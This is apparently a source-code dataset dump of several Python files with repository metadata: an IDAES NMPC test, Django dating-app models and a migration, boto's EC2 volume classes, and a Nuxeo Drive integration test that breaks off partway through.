blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1500a3650158cc07514dfc13b7275ebab2abb595 | 15c04e143e7b411e3020cf68eae4d6fbefa73c4b | /idaes/apps/caprese/tests/test_nmpc_constructor_4.py | 14a73fdc3ff7cc4ad9620af5e01d0088e5bdcc5a | [
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | ryder-shallbetter/idaes-pse | 57f272506edc9d1bce851680b8e451e64d08a90c | eed7790869d2859e92f0b3dd8ea3ebe8c9f0462c | refs/heads/master | 2022-12-09T07:10:44.905376 | 2020-09-04T23:00:39 | 2020-09-04T23:00:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,693 | py | ##############################################################################
# Institute for the Design of Advanced Energy Systems Process Systems
# Engineering Framework (IDAES PSE Framework) Copyright (c) 2018-2019, by the
# software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia
# University Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.txt and LICENSE.txt for full copyright and
# license information, respectively. Both files are also available online
# at the URL "https://github.com/IDAES/idaes-pse".
##############################################################################
"""
Test for Cappresse's module for NMPC.
"""
import pytest
from pyomo.environ import (Block, ConcreteModel, Constraint, Expression,
Set, SolverFactory, Var, value,
TransformationFactory, TerminationCondition)
from pyomo.network import Arc
from pyomo.kernel import ComponentSet
from idaes.core import (FlowsheetBlock, MaterialBalanceType, EnergyBalanceType,
MomentumBalanceType)
from idaes.core.util.model_statistics import (degrees_of_freedom,
activated_equalities_generator)
from idaes.core.util.initialization import initialize_by_time_element
from idaes.core.util.exceptions import ConfigurationError
from idaes.generic_models.unit_models import CSTR, Mixer, MomentumMixingType
from idaes.apps.caprese import nmpc
from idaes.apps.caprese.nmpc import *
from idaes.apps.caprese.examples.cstr_model import make_model
import idaes.logger as idaeslog
__author__ = "Robert Parker"
# See if ipopt is available and set up solver
if SolverFactory('ipopt').available():
solver = SolverFactory('ipopt')
solver.options = {'tol': 1e-6,
'mu_init': 1e-8,
'bound_push': 1e-8}
else:
solver = None
def assert_categorization(model):
init_input_set = ComponentSet([model.mixer.S_inlet.flow_vol[0],
model.mixer.E_inlet.flow_vol[0]])
init_deriv_list = []
init_diff_list = []
init_fixed_list = [
model.mixer.E_inlet.temperature[0],
model.mixer.S_inlet.temperature[0],
model.cstr.control_volume.energy_holdup[0, 'aq'],
model.cstr.control_volume.material_accumulation[0, 'aq', 'E'],
]
init_ic_list = [
model.cstr.control_volume.material_holdup[0, 'aq', 'S'],
model.cstr.control_volume.material_holdup[0, 'aq', 'C'],
model.cstr.control_volume.material_holdup[0, 'aq', 'P'],
model.cstr.control_volume.volume[0],
]
init_alg_list = [
model.cstr.control_volume.volume[0],
model.cstr.outlet.flow_vol[0],
model.cstr.outlet.temperature[0],
model.cstr.inlet.flow_vol[0],
model.cstr.inlet.temperature[0],
model.mixer.outlet.flow_vol[0],
model.mixer.outlet.temperature[0],
model.cstr.control_volume.energy_accumulation[0, 'aq'],
model.cstr.control_volume.material_holdup[0, 'aq', 'E'],
]
for j in model.properties.component_list:
init_deriv_list.append(
model.cstr.control_volume.material_accumulation[0, 'aq', j])
init_diff_list.append(
model.cstr.control_volume.material_holdup[0, 'aq', j])
init_fixed_list.append(model.mixer.E_inlet.conc_mol[0, j])
init_fixed_list.append(model.mixer.S_inlet.conc_mol[0, j])
init_alg_list.extend([
model.cstr.control_volume.properties_out[0].flow_mol_comp[j],
model.cstr.inlet.conc_mol[0, j],
model.cstr.control_volume.properties_in[0].flow_mol_comp[j],
model.cstr.control_volume.rate_reaction_generation[0, 'aq', j],
model.mixer.mixed_state[0].flow_mol_comp[j],
model.mixer.E_inlet_state[0].flow_mol_comp[j],
model.mixer.S_inlet_state[0].flow_mol_comp[j],
])
if j != 'Solvent':
init_alg_list.append(model.mixer.outlet.conc_mol[0, j])
init_alg_list.append(model.cstr.outlet.conc_mol[0, j])
else:
init_fixed_list.append(model.cstr.outlet.conc_mol[0, j])
init_fixed_list.append(model.mixer.outlet.conc_mol[0, j])
for r in model.reactions.rate_reaction_idx:
init_alg_list.extend([
model.cstr.control_volume.reactions[0].reaction_coef[r],
model.cstr.control_volume.reactions[0].reaction_rate[r],
model.cstr.control_volume.rate_reaction_extent[0, r]
])
init_deriv_set = ComponentSet(init_deriv_list)
init_diff_set = ComponentSet(init_diff_list)
init_fixed_set = ComponentSet(init_fixed_list)
init_ic_set = ComponentSet(init_ic_list)
init_alg_set = ComponentSet(init_alg_list)
assert model._NMPC_NAMESPACE.input_vars.n_vars == len(init_input_set)
for v in model._NMPC_NAMESPACE.input_vars:
assert v[0] in init_input_set
assert model._NMPC_NAMESPACE.deriv_vars.n_vars == len(init_deriv_set)
for v in model._NMPC_NAMESPACE.deriv_vars:
assert v[0] in init_deriv_set
assert len(model._NMPC_NAMESPACE.diff_vars) == len(init_deriv_set)
for v in model._NMPC_NAMESPACE.diff_vars:
assert v[0] in init_diff_set
assert len(model._NMPC_NAMESPACE.fixed_vars) == len(init_fixed_set)
for v in model._NMPC_NAMESPACE.fixed_vars:
assert v[0] in init_fixed_set
assert len(model._NMPC_NAMESPACE.alg_vars) == len(init_alg_set)
for v in model._NMPC_NAMESPACE.alg_vars:
assert v[0] in init_alg_set
assert len(model._NMPC_NAMESPACE.ic_vars) == len(init_ic_set)
for v in model._NMPC_NAMESPACE.ic_vars:
assert v[0] in init_ic_set
assert len(model._NMPC_NAMESPACE.scalar_vars) == 0
for var in model._NMPC_NAMESPACE.deriv_vars:
assert len(var) == len(model._NMPC_NAMESPACE.get_time())
assert var.index_set() is model._NMPC_NAMESPACE.get_time()
for var in model._NMPC_NAMESPACE.alg_vars:
assert len(var) == len(model._NMPC_NAMESPACE.get_time())
assert var.index_set() is model._NMPC_NAMESPACE.get_time()
@pytest.mark.component
def test_constructor_4():
m_plant = make_model(horizon=6, ntfe=60, ntcp=2)
m_controller = make_model(horizon=3, ntfe=30, ntcp=2)
sample_time = 0.5
# Six samples per horizon, five elements per sample
initial_plant_inputs = [m_plant.fs.mixer.S_inlet.flow_vol[0],
m_plant.fs.mixer.E_inlet.flow_vol[0]]
# Fix some derivative vars, as in pseudo-steady state
# Controller model only
for t in m_controller.fs.time:
m_controller.fs.cstr.control_volume.\
energy_accumulation[t, 'aq'].fix(0)
m_controller.fs.cstr.control_volume.\
material_accumulation[t, 'aq', 'E'].fix(0)
m_controller.fs.cstr.control_volume.\
energy_holdup[0, 'aq'].unfix()
m_controller.fs.cstr.control_volume.\
material_holdup[0, 'aq', 'E'].unfix()
m_controller.fs.cstr.control_volume.\
energy_accumulation_disc_eq.deactivate()
m_controller.fs.cstr.control_volume.\
material_accumulation_disc_eq.deactivate()
nmpc = NMPCSim(m_plant.fs, m_plant.fs.time,
m_controller.fs, m_controller.fs.time,
inputs_at_t0=initial_plant_inputs,
solver=solver, outlvl=idaeslog.DEBUG,
sample_time=sample_time)
if __name__ == '__main__':
test_constructor_4()
| [
"KSBeattie@lbl.gov"
] | KSBeattie@lbl.gov |
94857daf8736ce503d5898c9038a404167adde62 | 5d4158f1afa78f0a057c4e78846a918a1d4d3404 | /backend/dating/models.py | a0eec889f555525faa2e5a8a65b4854827a6acdf | [] | no_license | crowdbotics-apps/ayou-20920 | 08c1c10a73a134a53449b8688634564ed5293a21 | 0b51e4eacf271f8a956c530cdad52c57a2fa6f88 | refs/heads/master | 2022-12-18T05:33:07.601092 | 2020-10-01T03:51:32 | 2020-10-01T03:51:32 | 300,129,734 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,637 | py | from django.conf import settings
from django.db import models
class Profile(models.Model):
    "Generated Model"
    # Free-form user biography and school name.
    bio = models.TextField()
    school = models.TextField()
    date_of_birth = models.DateField()
    # created is stamped once on insert; modified refreshes on every save.
    created = models.DateField(
        auto_now_add=True,
    )
    modified = models.DateField(
        auto_now=True,
    )
    # One profile per user; deleting the user cascades to the profile.
    # NOTE(review): nullable one-to-one means a user may exist without a
    # profile — confirm this is intended.
    user = models.OneToOneField(
        "users.User",
        null=True,
        blank=True,
        on_delete=models.CASCADE,
        related_name="profile_user",
    )
class UserPhoto(models.Model):
    "Generated Model"
    # Owning user; a user may have many photos (no uniqueness constraint).
    user = models.ForeignKey(
        "users.User",
        on_delete=models.CASCADE,
        related_name="userphoto_user",
    )
    # URL of the externally hosted photo (the image itself is not stored here).
    photo = models.URLField()
class Setting(models.Model):
    "Generated Model"
    # Matching preferences.
    maximum_distance = models.IntegerField()
    gender = models.CharField(
        max_length=256,
    )
    # NOTE(review): a single integer for an age *range* looks lossy —
    # confirm whether min/max ages were intended.
    age_range = models.IntegerField()
    show_me_on_searches = models.BooleanField()
    # Per-event notification toggles.
    new_matches_notification = models.BooleanField()
    message_notification = models.BooleanField()
    message_likes_notification = models.BooleanField()
    super_like_notification = models.BooleanField()
    in_app_vibrations = models.BooleanField()
    # ForeignKey (not OneToOne), so multiple Setting rows per user are
    # possible at the schema level.
    user = models.ForeignKey(
        "users.User",
        null=True,
        blank=True,
        on_delete=models.CASCADE,
        related_name="setting_user",
    )
class Dislike(models.Model):
    "Generated Model"
    # The user who issued the dislike.
    owner = models.ForeignKey(
        "users.User",
        on_delete=models.CASCADE,
        related_name="dislike_owner",
    )
    # The user being disliked.
    user = models.ForeignKey(
        "users.User",
        on_delete=models.CASCADE,
        related_name="dislike_user",
    )
class Like(models.Model):
    "Generated Model"
    # The user who issued the like.
    owner = models.ForeignKey(
        "users.User",
        on_delete=models.CASCADE,
        related_name="like_owner",
    )
    # The user being liked.
    user = models.ForeignKey(
        "users.User",
        on_delete=models.CASCADE,
        related_name="like_user",
    )
    # True when this like was a "super like".
    super_liked = models.BooleanField()
class Inbox(models.Model):
    "Generated Model"
    # URL-friendly identifier for the inbox.
    # NOTE(review): not marked unique — confirm whether duplicate slugs
    # are acceptable.
    slug = models.SlugField(
        max_length=50,
    )
    created = models.DateTimeField(
        auto_now_add=True,
    )
class Match(models.Model):
    "Generated Model"
    # The matched user.
    user = models.ForeignKey(
        "users.User",
        on_delete=models.CASCADE,
        related_name="match_user",
    )
    # The user on whose behalf the match record was created.
    owner = models.ForeignKey(
        "users.User",
        on_delete=models.CASCADE,
        related_name="match_owner",
    )
    created = models.DateTimeField(
        auto_now_add=True,
    )
# Create your models here.
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
8542d8f94f5387e2b934915f15545a3bf0b258a6 | a59d55ecf9054d0750168d3ca9cc62a0f2b28b95 | /.install/.backup/platform/gsutil/third_party/boto/boto/ec2/volume.py | 95121fa8134b8cffc7f46533ef2b3dbf26f3c8b3 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | bopopescu/google-cloud-sdk | bb2746ff020c87271398196f21a646d9d8689348 | b34e6a18f1e89673508166acce816111c3421e4b | refs/heads/master | 2022-11-26T07:33:32.877033 | 2014-06-29T20:43:23 | 2014-06-29T20:43:23 | 282,306,367 | 0 | 0 | NOASSERTION | 2020-07-24T20:04:47 | 2020-07-24T20:04:46 | null | UTF-8 | Python | false | false | 10,262 | py | # Copyright (c) 2006-2012 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2010, Eucalyptus Systems, Inc.
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Represents an EC2 Elastic Block Storage Volume
"""
from boto.resultset import ResultSet
from boto.ec2.tag import Tag
from boto.ec2.ec2object import TaggedEC2Object
class Volume(TaggedEC2Object):
    """
    Represents an EBS volume.
    :ivar id: The unique ID of the volume.
    :ivar create_time: The timestamp of when the volume was created.
    :ivar status: The status of the volume.
    :ivar size: The size (in GB) of the volume.
    :ivar snapshot_id: The ID of the snapshot this volume was created
        from, if applicable.
    :ivar attach_data: An AttachmentSet object.
    :ivar zone: The availability zone this volume is in.
    :ivar type: The type of volume (standard or consistent-iops)
    :ivar iops: If this volume is of type consistent-iops, this is
        the number of IOPS provisioned (10-300).
    """

    def __init__(self, connection=None):
        # All fields start as None; they are filled in by the SAX handlers
        # below as the DescribeVolumes response is parsed.
        super(Volume, self).__init__(connection)
        self.id = None
        self.create_time = None
        self.status = None
        self.size = None
        self.snapshot_id = None
        self.attach_data = None
        self.zone = None
        self.type = None
        self.iops = None

    def __repr__(self):
        return 'Volume:%s' % self.id

    def startElement(self, name, attrs, connection):
        # Let the base class claim tag-related elements first; a non-None
        # return means it handled the element.
        retval = super(Volume, self).startElement(name, attrs, connection)
        if retval is not None:
            return retval
        # Delegate nested structures to dedicated sub-parsers.
        if name == 'attachmentSet':
            self.attach_data = AttachmentSet()
            return self.attach_data
        elif name == 'tagSet':
            self.tags = ResultSet([('item', Tag)])
            return self.tags
        else:
            return None

    def endElement(self, name, value, connection):
        # Map each known response element onto its attribute; unknown
        # elements are preserved verbatim via setattr.
        if name == 'volumeId':
            self.id = value
        elif name == 'createTime':
            self.create_time = value
        elif name == 'status':
            # An empty status element would otherwise clobber a real value.
            if value != '':
                self.status = value
        elif name == 'size':
            self.size = int(value)
        elif name == 'snapshotId':
            self.snapshot_id = value
        elif name == 'availabilityZone':
            self.zone = value
        elif name == 'volumeType':
            self.type = value
        elif name == 'iops':
            self.iops = int(value)
        else:
            setattr(self, name, value)

    def _update(self, updated):
        # Copy all state from a freshly fetched Volume onto this instance.
        self.__dict__.update(updated.__dict__)

    def update(self, validate=False, dry_run=False):
        """
        Update the data associated with this volume by querying EC2.
        :type validate: bool
        :param validate: By default, if EC2 returns no data about the
            volume the update method returns quietly. If
            the validate param is True, however, it will
            raise a ValueError exception if no data is
            returned from EC2.
        """
        # Check the resultset since Eucalyptus ignores the volumeId param
        unfiltered_rs = self.connection.get_all_volumes(
            [self.id],
            dry_run=dry_run
        )
        rs = [x for x in unfiltered_rs if x.id == self.id]
        if len(rs) > 0:
            self._update(rs[0])
        elif validate:
            raise ValueError('%s is not a valid Volume ID' % self.id)
        return self.status

    def delete(self, dry_run=False):
        """
        Delete this EBS volume.
        :rtype: bool
        :return: True if successful
        """
        return self.connection.delete_volume(self.id, dry_run=dry_run)

    def attach(self, instance_id, device, dry_run=False):
        """
        Attach this EBS volume to an EC2 instance.
        :type instance_id: str
        :param instance_id: The ID of the EC2 instance to which it will
            be attached.
        :type device: str
        :param device: The device on the instance through which the
            volume will be exposed (e.g. /dev/sdh)
        :rtype: bool
        :return: True if successful
        """
        return self.connection.attach_volume(
            self.id,
            instance_id,
            device,
            dry_run=dry_run
        )

    def detach(self, force=False, dry_run=False):
        """
        Detach this EBS volume from an EC2 instance.
        :type force: bool
        :param force: Forces detachment if the previous detachment
            attempt did not occur cleanly. This option can lead to
            data loss or a corrupted file system. Use this option only
            as a last resort to detach a volume from a failed
            instance. The instance will not have an opportunity to
            flush file system caches nor file system meta data. If you
            use this option, you must perform file system check and
            repair procedures.
        :rtype: bool
        :return: True if successful
        """
        # attach_data may be absent if the volume was never attached.
        instance_id = None
        if self.attach_data:
            instance_id = self.attach_data.instance_id
        device = None
        if self.attach_data:
            device = self.attach_data.device
        return self.connection.detach_volume(
            self.id,
            instance_id,
            device,
            force,
            dry_run=dry_run
        )

    def create_snapshot(self, description=None, dry_run=False):
        """
        Create a snapshot of this EBS Volume.
        :type description: str
        :param description: A description of the snapshot.
            Limited to 256 characters.
        :rtype: :class:`boto.ec2.snapshot.Snapshot`
        :return: The created Snapshot object
        """
        return self.connection.create_snapshot(
            self.id,
            description,
            dry_run=dry_run
        )

    def volume_state(self):
        """
        Returns the state of the volume. Same value as the status attribute.
        """
        return self.status

    def attachment_state(self):
        """
        Get the attachment state.
        """
        # None when the volume has never been attached.
        state = None
        if self.attach_data:
            state = self.attach_data.status
        return state

    def snapshots(self, owner=None, restorable_by=None, dry_run=False):
        """
        Get all snapshots related to this volume. Note that this requires
        that all available snapshots for the account be retrieved from EC2
        first and then the list is filtered client-side to contain only
        those for this volume.
        :type owner: str
        :param owner: If present, only the snapshots owned by the
            specified user will be returned. Valid values are:
            * self
            * amazon
            * AWS Account ID
        :type restorable_by: str
        :param restorable_by: If present, only the snapshots that
            are restorable by the specified account id will be returned.
        :rtype: list of L{boto.ec2.snapshot.Snapshot}
        :return: The requested Snapshot objects
        """
        rs = self.connection.get_all_snapshots(
            owner=owner,
            restorable_by=restorable_by,
            dry_run=dry_run
        )
        # Client-side filter: keep only snapshots taken from this volume.
        mine = []
        for snap in rs:
            if snap.volume_id == self.id:
                mine.append(snap)
        return mine
class AttachmentSet(object):
    """
    Represents an EBS attachment set.

    :ivar id: The unique ID of the volume.
    :ivar instance_id: The unique ID of the attached instance
    :ivar status: The status of the attachment
    :ivar attach_time: Attached since
    :ivar device: The device the instance has mapped
    """

    # EC2 response element name -> attribute it populates. Elements not
    # listed here are stored verbatim under their own name.
    _ELEMENT_TO_ATTR = {
        'volumeId': 'id',
        'instanceId': 'instance_id',
        'status': 'status',
        'attachTime': 'attach_time',
        'device': 'device',
    }

    def __init__(self):
        for attr_name in ('id', 'instance_id', 'status',
                          'attach_time', 'device'):
            setattr(self, attr_name, None)

    def __repr__(self):
        return 'AttachmentSet:%s' % self.id

    def startElement(self, name, attrs, connection):
        # An attachment set contains no nested structures to delegate to.
        pass

    def endElement(self, name, value, connection):
        # Translate the element name and store the raw string value.
        setattr(self, self._ELEMENT_TO_ATTR.get(name, name), value)
class VolumeAttribute(object):
    """
    Parses a DescribeVolumeAttribute response.

    :ivar id: The ID of the volume the attribute belongs to.
    :ivar attrs: Mapping of attribute name (e.g. ``autoEnableIO``) to its
        boolean value.
    """

    def __init__(self, parent=None):
        self.id = None
        self._key_name = None
        self.attrs = {}

    def startElement(self, name, attrs, connection):
        # Remember which boolean attribute the upcoming <value> element
        # belongs to.
        if name == 'autoEnableIO':
            self._key_name = name
        return None

    def endElement(self, name, value, connection):
        if name == 'value':
            # Coerce the textual flag into a real boolean.
            self.attrs[self._key_name] = value.lower() == 'true'
        elif name == 'volumeId':
            self.id = value
        else:
            setattr(self, name, value)
| [
"alfred.wechselberger@technologyhatchery.com"
] | alfred.wechselberger@technologyhatchery.com |
4b85b79664d408e8e59f8668f2192d221940e4a3 | fcc25875b877510d5603fccfd0b85dbac58fa8d9 | /app/migrations/0003_auto_20170802_1443.py | 07ffea30903d1e974b645322a9555bd034f418b0 | [] | no_license | kmjnhb/repo | be44e0d7a685aae140e581a5b8c0935a8ddf0d7b | ac3cb388f87f2188900beac956dee6c701aaa556 | refs/heads/master | 2021-01-02T08:55:48.242512 | 2017-08-06T19:37:53 | 2017-08-06T19:37:53 | 99,100,726 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 996 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-08-02 14:43
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by Django 1.11.4; do not hand-edit operations.

    dependencies = [
        # Runs after the swappable user model and the previous app migration.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('app', '0002_auto_20170802_1055'),
    ]

    operations = [
        # New Manager model: one row per user, flagged by is_manager.
        migrations.CreateModel(
            name='Manager',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('is_manager', models.BooleanField(default=False)),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        # Existing Client rows gain an explicit is_client flag.
        migrations.AddField(
            model_name='client',
            name='is_client',
            field=models.BooleanField(default=False),
        ),
    ]
| [
"you@example.com"
] | you@example.com |
41e40cf789ecd98da9bf0c36bce15b2362c97741 | 21c147d677ca59b6cb85900cf698896b658bcf45 | /nuxeo-drive-client/nxdrive/tests/test_integration_synchronization.py | 4e2318b7819eec2f9f3b93ecdd0fcd4f9cccbf15 | [] | no_license | bjalon/nuxeo-drive | c674d98aa1ec35bea7cb6f7f3240540cdbb55ce5 | 30f70c4da6f8bdf245d3444f5f546cb3236cf418 | refs/heads/master | 2021-01-23T21:30:07.839766 | 2012-09-03T12:44:59 | 2012-09-03T12:44:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,231 | py | import hashlib
import os
import shutil
import tempfile
import time
import urllib2
import socket
import httplib
from nose import with_setup
from nose import SkipTest
from nose.tools import assert_equal
from nxdrive.client import NuxeoClient
from nxdrive.client import LocalClient
from nxdrive.controller import Controller
# Server-side location and title of the workspace used by the tests.
TEST_WORKSPACE_PATH = '/default-domain/workspaces/test-nxdrive'
TEST_WORKSPACE_TITLE = 'Nuxeo Drive Tests'
TEST_WORKSPACE = None  # document uid of the workspace, set during setup

# Reference digests/content used by individual tests.
EMPTY_DIGEST = hashlib.md5().hexdigest()
SOME_TEXT_CONTENT = "Some text content."
SOME_TEXT_DIGEST = hashlib.md5(SOME_TEXT_CONTENT).hexdigest()

# Connection settings, read from the environment during setup.
NUXEO_URL = None
USER = None
PASSWORD = None

# Local scratch folders, created during setup and removed in teardown.
LOCAL_TEST_FOLDER = None
LOCAL_NXDRIVE_FOLDER = None
LOCAL_NXDRIVE_CONF_FOLDER = None

remote_client = None  # NuxeoClient rooted at the test workspace
ctl = None  # Controller instance under test
def setup_integration_env():
    """Create the remote test workspace and the local scratch folders.

    Populates the module-level globals used by all tests. Skips the whole
    test module when the NXDRIVE_TEST_* environment variables are not set.
    """
    global NUXEO_URL, USER, PASSWORD
    # NOTE(review): 'lcclient' is declared global but never assigned in this
    # function — looks like a leftover; confirm before removing.
    global remote_client, lcclient, TEST_WORKSPACE, LOCAL_TEST_FOLDER
    global LOCAL_NXDRIVE_FOLDER, LOCAL_NXDRIVE_CONF_FOLDER
    global ctl
    # Check the Nuxeo server test environment
    NUXEO_URL = os.environ.get('NXDRIVE_TEST_NUXEO_URL')
    USER = os.environ.get('NXDRIVE_TEST_USER')
    PASSWORD = os.environ.get('NXDRIVE_TEST_PASSWORD')
    if None in (NUXEO_URL, USER, PASSWORD):
        raise SkipTest("No integration server configuration found in "
                       "environment.")
    # Create the workspace under its parent using a root-scoped client.
    parent_path = os.path.dirname(TEST_WORKSPACE_PATH)
    workspace_name = os.path.basename(TEST_WORKSPACE_PATH)
    root_remote_client = NuxeoClient(NUXEO_URL, USER, PASSWORD,
                                     base_folder='/')
    TEST_WORKSPACE = root_remote_client.create(
        parent_path, 'Workspace', name=workspace_name,
        properties={'dc:title': TEST_WORKSPACE_TITLE})[u'uid']
    # Client used to create remote test documents and folders
    remote_client = NuxeoClient(NUXEO_URL, USER, PASSWORD,
                                base_folder=TEST_WORKSPACE)
    # Check the local filesystem test environment
    LOCAL_TEST_FOLDER = tempfile.mkdtemp('-nuxeo-drive-tests')
    LOCAL_NXDRIVE_FOLDER = os.path.join(
        LOCAL_TEST_FOLDER, 'Nuxeo Drive')
    os.mkdir(LOCAL_NXDRIVE_FOLDER)
    LOCAL_NXDRIVE_CONF_FOLDER = os.path.join(
        LOCAL_TEST_FOLDER, 'nuxeo-drive-conf')
    os.mkdir(LOCAL_NXDRIVE_CONF_FOLDER)
    ctl = Controller(LOCAL_NXDRIVE_CONF_FOLDER)
def teardown_integration_env():
    """Release the controller session, remove the remote test workspace
    and wipe the local scratch folders created by setup_integration_env().
    Each step is guarded so a partially completed setup still cleans up.
    """
    controller = ctl
    if controller is not None:
        controller.get_session().close()
    client = remote_client
    if client is not None and client.exists(TEST_WORKSPACE):
        client.delete(TEST_WORKSPACE, use_trash=False)
    if os.path.exists(LOCAL_TEST_FOLDER):
        shutil.rmtree(LOCAL_TEST_FOLDER)
# nose decorator that wraps each test with the setup/teardown pair above.
with_integration_env = with_setup(
    setup_integration_env, teardown_integration_env)
def make_server_tree():
    """Populate the remote test workspace with a small folder/file tree.

    Layout created:
        Folder 1/File 1.txt, Folder 1.1/File 2.txt, Folder 1.2/File 3.txt
        Folder 2/File 4.txt plus two files sharing the same name
        File 5.txt at the workspace root
    """
    # create some folders on the server
    folder_1 = remote_client.make_folder(TEST_WORKSPACE, 'Folder 1')
    folder_1_1 = remote_client.make_folder(folder_1, 'Folder 1.1')
    folder_1_2 = remote_client.make_folder(folder_1, 'Folder 1.2')
    folder_2 = remote_client.make_folder(TEST_WORKSPACE, 'Folder 2')
    # create some files on the server; the duplicated name exercises the
    # client-side deduplication logic ("Duplicated File__1.txt").
    remote_client.make_file(folder_2, 'Duplicated File.txt',
                            content="Some content.")
    remote_client.make_file(folder_2, 'Duplicated File.txt',
                            content="Other content.")
    remote_client.make_file(folder_1, 'File 1.txt', content="aaa")
    remote_client.make_file(folder_1_1, 'File 2.txt', content="bbb")
    remote_client.make_file(folder_1_2, 'File 3.txt', content="ccc")
    remote_client.make_file(folder_2, 'File 4.txt', content="ddd")
    remote_client.make_file(TEST_WORKSPACE, 'File 5.txt', content="eee")
@with_integration_env
def test_binding_initialization_and_first_sync():
    """Bind a populated server workspace and drive a full first sync,
    checking folder skeleton creation, state reporting, pending lists,
    partial (limited) synchronization and final content download.
    """
    # Create some documents in a Nuxeo workspace and bind this server to a
    # Nuxeo Drive local folder
    make_server_tree()
    ctl.bind_server(LOCAL_NXDRIVE_FOLDER, NUXEO_URL, USER, PASSWORD)
    ctl.bind_root(LOCAL_NXDRIVE_FOLDER, TEST_WORKSPACE)
    # The binding operation creates a new local folder with the Workspace name
    # and reproduce the server side structure with folders and empty documents.
    expected_folder = os.path.join(LOCAL_NXDRIVE_FOLDER, TEST_WORKSPACE_TITLE)
    local = LocalClient(expected_folder)
    level_0 = local.get_children_info('/')

    def size(info):
        # Local placeholder files are created empty before content download.
        return os.stat(info.filepath).st_size

    assert_equal(len(level_0), 3)
    assert_equal(level_0[0].name, 'File 5.txt')
    assert_equal(size(level_0[0]), 0)
    assert_equal(level_0[1].name, 'Folder 1')
    assert_equal(level_0[2].name, 'Folder 2')
    level_1 = local.get_children_info(level_0[1].path)
    assert_equal(len(level_1), 3)
    assert_equal(level_1[0].name, 'File 1.txt')
    assert_equal(size(level_1[0]), 0)
    assert_equal(level_1[1].name, 'Folder 1.1')
    assert_equal(level_1[2].name, 'Folder 1.2')
    level_2 = local.get_children_info(level_0[2].path)
    assert_equal(len(level_2), 3)
    assert_equal(level_2[0].name, 'Duplicated File.txt')
    assert_equal(size(level_2[0]), 0)
    assert_equal(level_2[1].name, 'Duplicated File__1.txt')  # deduped name
    assert_equal(size(level_2[1]), 0)
    assert_equal(level_2[2].name, 'File 4.txt')
    assert_equal(size(level_2[2]), 0)
    # Check the aggregate states information from the controller
    states = ctl.children_states(expected_folder)
    expected_states = [
        (u'/File 5.txt', 'remotely_modified'),
        (u'/Folder 1', 'children_modified'),
        (u'/Folder 2', 'children_modified'),
    ]
    assert_equal(states, expected_states)
    states = ctl.children_states(expected_folder + '/Folder 1')
    expected_states = [
        (u'/Folder 1/File 1.txt', 'remotely_modified'),
        (u'/Folder 1/Folder 1.1', 'children_modified'),
        (u'/Folder 1/Folder 1.2', 'children_modified'),
    ]
    assert_equal(states, expected_states)
    states = ctl.children_states(expected_folder + '/Folder 1/Folder 1.1')
    expected_states = [
        (u'/Folder 1/Folder 1.1/File 2.txt', 'remotely_modified'),
    ]
    assert_equal(states, expected_states)
    # Check the list of files and folders with synchronization pending
    pending = ctl.list_pending()
    assert_equal(len(pending), 7)
    assert_equal(pending[0].path, '/File 5.txt')
    assert_equal(pending[1].path, '/Folder 1/File 1.txt')
    assert_equal(pending[2].path, '/Folder 1/Folder 1.1/File 2.txt')
